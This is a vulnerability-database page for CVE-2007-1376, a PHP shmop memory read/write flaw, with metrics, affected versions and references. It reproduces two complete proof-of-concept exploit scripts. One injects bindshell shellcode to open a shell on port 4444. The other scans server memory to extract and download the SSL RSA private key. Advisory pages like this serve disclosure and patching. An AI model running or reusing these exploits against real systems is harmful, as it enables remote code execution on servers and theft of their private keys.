CVE-2007-1376 : Detail

CVE-2007-1376

5.39%V3
Network
2007-03-09
23h00 +00:00
2017-10-09
22h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

The shmop functions in PHP before 4.4.5, and before 5.2.1 in the 5.x series, do not verify that their arguments correspond to a shmop resource, which allows context-dependent attackers to read and write arbitrary memory locations via arguments associated with an inappropriate resource, as demonstrated by a GD Image resource.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 3426

Publication date : 2007-03-06 23h00 +00:00
Author : Stefan Esser
EDB Verified : Yes

<?php //////////////////////////////////////////////////////////////////////// // _ _ _ _ ___ _ _ ___ // // | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \| || || _ \ // // | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___|| _/| __ || _/ // // |_||_|\__,_||_| \__,_|\___||_||_|\___|\__,_| |_| |_||_||_| // // // // Proof of concept code from the Hardened-PHP Project // // (C) Copyright 2007 Stefan Esser // // // //////////////////////////////////////////////////////////////////////// // PHP ext/shmop Code Execution Exploit // //////////////////////////////////////////////////////////////////////// // This is meant as a protection against remote file inclusion. die("REMOVE THIS LINE"); if (!extension_loaded("gd") || !extension_loaded("shmop")) { die("This demonstration exploit only works with ext/gd and ext/shmop loaded."); } // This exploit contains a bindshell shellcode for linux x86 from metasploit // Therefore it only works with linux x86. It only works in PHP < 5.2.0 because // it searches for the shellcode by simply scanning the Apache memory // which is not possible with the new memory manager anymore $shellcode = "\x29\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x46". "\x32\x3c\xe5\x83\xeb\xfc\xe2\xf4\x77\xe9\x6f\xa6\x15\x58\x3e\x8f". "\x20\x6a\xa5\x6c\xa7\xff\xbc\x73\x05\x60\x5a\x8d\x57\x6e\x5a\xb6". "\xcf\xd3\x56\x83\x1e\x62\x6d\xb3\xcf\xd3\xf1\x65\xf6\x54\xed\x06". "\x8b\xb2\x6e\xb7\x10\x71\xb5\x04\xf6\x54\xf1\x65\xd5\x58\x3e\xbc". "\xf6\x0d\xf1\x65\x0f\x4b\xc5\x55\x4d\x60\x54\xca\x69\x41\x54\x8d". "\x69\x50\x55\x8b\xcf\xd1\x6e\xb6\xcf\xd3\xf1\x65"; function init() { global $rid; $rid = imagecreate(10,10); imagecolorallocate($rid, 0, 0, 0); imagecolorallocate($rid, 0, 0, 0); } function peek($addr, $size) { global $rid; imagecolordeallocate($rid, 0); imagecolordeallocate($rid, 1); imagecolorallocate($rid, $addr, 0, 0); imagecolorallocate($rid, $size, 0, 0); return shmop_read((int)$rid, 0, $size); } function poke($addr, $val) { global $rid; imagecolordeallocate($rid, 0); imagecolordeallocate($rid, 1); imagecolorallocate($rid, $addr, 0, 0); imagecolorallocate($rid, strlen($val), 0, 0); return shmop_write((int)$rid, $val, 0); } init(); $arr = array(); for ($i=0; $i<129; $i++) { $arr[$i] = ""; } $arr[$shellcode] = 1; for ($i=0; $i<129; $i++) { unset($arr[$i]); } $offset = 0x08048000 + 1024 * 64; while (1) { $data = peek($offset, 1024 + 16); $position = strpos($data, "\x00\x01\x00\x00\xff\x00\x00\x00\x01\x00\x00\x00"); if ($position !== false && $position < 1024) { $addr = unpack("L", peek($offset+$position+24, 4)); $addr = $addr[1] + 32; $addr = pack("L", $addr); poke($offset+$position+32, $addr); echo "There should be a shell bound to port 4444 now\n\n"; unset($arr); die(); } $offset += 1024; } ?> # milw0rm.com [2007-03-07]
Exploit Database EDB-ID : 3427

Publication date : 2007-03-06 23h00 +00:00
Author : Stefan Esser
EDB Verified : Yes

<?php //////////////////////////////////////////////////////////////////////// // _ _ _ _ ___ _ _ ___ // // | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \| || || _ \ // // | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___|| _/| __ || _/ // // |_||_|\__,_||_| \__,_|\___||_||_|\___|\__,_| |_| |_||_||_| // // // // Proof of concept code from the Hardened-PHP Project // // (C) Copyright 2007 Stefan Esser // // // //////////////////////////////////////////////////////////////////////// // PHP ext/shmop SSL RSA Private-Key Disclosure Exploit // //////////////////////////////////////////////////////////////////////// // This is meant as a protection against remote file inclusion. die("REMOVE THIS LINE"); if (!extension_loaded("gd") || !extension_loaded("shmop")) { die("This demonstration exploit only works with ext/gd and ext/shmop loaded."); } function init() { global $rid; $rid = imagecreate(10,10); imagecolorallocate($rid, 0, 0, 0); imagecolorallocate($rid, 0, 0, 0); } function peek($addr, $size) { global $rid; imagecolordeallocate($rid, 0); imagecolordeallocate($rid, 1); imagecolorallocate($rid, $addr, 0, 0); imagecolorallocate($rid, $size, 0, 0); return shmop_read((int)$rid, 0, $size); } init(); $offset = 0x08048000 + 1024 * 64; while (1) { $data = peek($offset, 1024 + 16); $position = strpos($data, "\x30\x82"); if ($position !== false && $position < 1024) { // Potential Key if (substr($data, $position+4, 4) == "\x02\x01\x00\x02") { $length = ord($data[$position+2])*256+ord($data[$position+3])+4; $keydata = peek($offset + $position, $length); // Assume an exponent of 0x10001 to really find a RSA key and not a DSA one if (strpos($keydata, "\x01\x00\x01") > 0) break; } } $offset += 1024; } header("Content-type: application/octet-stream"); header("Content-Disposition: attachment; filename=\"server.der\""); echo $keydata; ?> # milw0rm.com [2007-03-07]

Products Mentioned

Configuraton 0

Php>>Php >> Version 4.0

Php>>Php >> Version 4.0

Php>>Php >> Version 4.0

Php>>Php >> Version 4.0

Php>>Php >> Version 4.0

Php>>Php >> Version 4.0

Php>>Php >> Version 4.0

Php>>Php >> Version 4.0

Php>>Php >> Version 4.0.0

Php>>Php >> Version 4.0.1

Php>>Php >> Version 4.0.1

Php>>Php >> Version 4.0.1

Php>>Php >> Version 4.0.2

Php>>Php >> Version 4.0.3

Php>>Php >> Version 4.0.3

Php>>Php >> Version 4.0.4

Php>>Php >> Version 4.0.4

    Php>>Php >> Version 4.0.5

    Php>>Php >> Version 4.0.6

    Php>>Php >> Version 4.0.7

    Php>>Php >> Version 4.0.7

    Php>>Php >> Version 4.0.7

    Php>>Php >> Version 4.0.7

    Php>>Php >> Version 4.1.0

    Php>>Php >> Version 4.1.1

    Php>>Php >> Version 4.1.2

    Php>>Php >> Version 4.2

      Php>>Php >> Version 4.2.0

      Php>>Php >> Version 4.2.1

      Php>>Php >> Version 4.2.2

      Php>>Php >> Version 4.2.3

      Php>>Php >> Version 4.3.0

      Php>>Php >> Version 4.3.1

      Php>>Php >> Version 4.3.2

      Php>>Php >> Version 4.3.3

      Php>>Php >> Version 4.3.4

      Php>>Php >> Version 4.3.5

      Php>>Php >> Version 4.3.6

      Php>>Php >> Version 4.3.7

      Php>>Php >> Version 4.3.8

      Php>>Php >> Version 4.3.9

      Php>>Php >> Version 4.3.10

      Php>>Php >> Version 4.3.11

      Php>>Php >> Version 4.4.0

      Php>>Php >> Version 4.4.1

      Php>>Php >> Version 4.4.2

      Php>>Php >> Version 4.4.3

      Php>>Php >> Version 4.4.4

      Php>>Php >> Version 4.4.5

      Php>>Php >> Version 5.0

        Php>>Php >> Version 5.0

          Php>>Php >> Version 5.0

            Php>>Php >> Version 5.0.0

            Php>>Php >> Version 5.0.0

            Php>>Php >> Version 5.0.0

            Php>>Php >> Version 5.0.0

            Php>>Php >> Version 5.0.0

            Php>>Php >> Version 5.0.0

            Php>>Php >> Version 5.0.0

            Php>>Php >> Version 5.0.0

            Php>>Php >> Version 5.0.1

            Php>>Php >> Version 5.0.2

            Php>>Php >> Version 5.0.3

            Php>>Php >> Version 5.0.4

            Php>>Php >> Version 5.0.5

            Php>>Php >> Version 5.1.0

            Php>>Php >> Version 5.1.1

            Php>>Php >> Version 5.1.2

            Php>>Php >> Version 5.1.3

            Php>>Php >> Version 5.1.4

            Php>>Php >> Version 5.1.5

            Php>>Php >> Version 5.1.6

            Php>>Php >> Version 5.2.0

            References

            http://secunia.com/advisories/25056
            Tags : third-party-advisory, x_refsource_SECUNIA
            http://www.osvdb.org/32781
            Tags : vdb-entry, x_refsource_OSVDB
            http://www.debian.org/security/2007/dsa-1283
            Tags : vendor-advisory, x_refsource_DEBIAN
            http://secunia.com/advisories/24606
            Tags : third-party-advisory, x_refsource_SECUNIA
            http://security.gentoo.org/glsa/glsa-200703-21.xml
            Tags : vendor-advisory, x_refsource_GENTOO
            http://secunia.com/advisories/25062
            Tags : third-party-advisory, x_refsource_SECUNIA
            https://www.exploit-db.com/exploits/3427
            Tags : exploit, x_refsource_EXPLOIT-DB
            http://www.ubuntu.com/usn/usn-455-1
            Tags : vendor-advisory, x_refsource_UBUNTU
            http://www.securityfocus.com/bid/22862
            Tags : vdb-entry, x_refsource_BID
            https://www.exploit-db.com/exploits/3426
            Tags : exploit, x_refsource_EXPLOIT-DB
            http://secunia.com/advisories/25057
            Tags : third-party-advisory, x_refsource_SECUNIA